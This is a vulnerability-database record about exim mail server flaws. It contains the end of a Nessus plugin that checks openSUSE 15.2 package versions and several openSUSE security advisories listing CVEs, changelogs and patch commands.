value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185631\");\n script_set_attribute(attribute:\"see_also\", value:\"https://reproducible-builds.org/specs/source-date-epoch/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15846\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-debuginfo-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-debugsource-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximon-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximon-debuginfo-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximstats-html-4.94.2-lp152.8.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2017-08-29T21:10:26", "description": "This update for exim fixes the following issues:\n\n Changes in exim:\n - specify users with ref:mail, to make them dynamic. (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to "stack\n crash" local privilege escalation (boo#1044692)\n - Require user(mail) group(mail) to meet new users handling in TW.\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL < 1.0\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\n\n", "cvss3": {}, "published": "2017-08-29T18:39:29", "type": "suse", "title": "Security update for exim (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "modified": "2017-08-29T18:39:29", "id": "OPENSUSE-SU-2017:2289-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00072.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-20T18:15:03", "description": "This update for exim fixes the following issues:\n\n - CVE-2017-1000369: Fixed a memory leak in exim commandline handling,\n which could be used to exhaust memory and make "stack crash" attacks\n likely. (boo#1044692)\n\n", "cvss3": {}, "published": "2017-06-20T15:10:52", "type": "suse", "title": "Security update for exim (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-20T15:10:52", "id": "OPENSUSE-SU-2017:1625-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-06/msg00020.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-04T12:08:03", "description": "This update to exim 4.86.2 fixes the following issues:\n\n * CVE-2016-1531: local privilege escalation for set-uid root exim when\n using 'perl_startup' (boo#968844)\n\n Important: Exim now cleans the complete execution environment by default.\n This affects Exim and subprocesses such as transports calling other\n programs. The following new options are supported to adjust this behaviour:\n * keep_environment\n * add_environment A warning will be printed upon startup if none of these\n are configured.\n\n Also includes upstream changes, improvements and bug fixes:\n * Support for using the system standard CA bundle.\n * New expansion items $config_file, $config_dir, containing the file and\n directory name of the main configuration file. Also $exim_version.\n * New "malware=" support for Avast.\n * New "spam=" variant option for Rspamd.\n * Assorted options on malware= and spam= scanners.\n * A commandline option to write a comment into the logfile.\n * A logging option for slow DNS lookups.\n * New ${env {<variable>}} expansion.\n * A non-SMTP authenticator using information from TLS client\n certificates.\n * Main option "tls_eccurve" for selecting an Elliptic Curve for TLS.\n * Main option "dns_trust_aa" for trusting your local nameserver at the\n same level as DNSSEC.\n\n", "cvss3": {}, "published": "2016-03-11T14:16:09", "type": "suse", "title": "Security update for exim (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-11T14:16:09", "id": "OPENSUSE-SU-2016:0721-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00026.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. (This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n This update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-754=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0754-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/3FZPX7R5ELKQM2EW7W2JYZ7EFIIDTT4E/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an 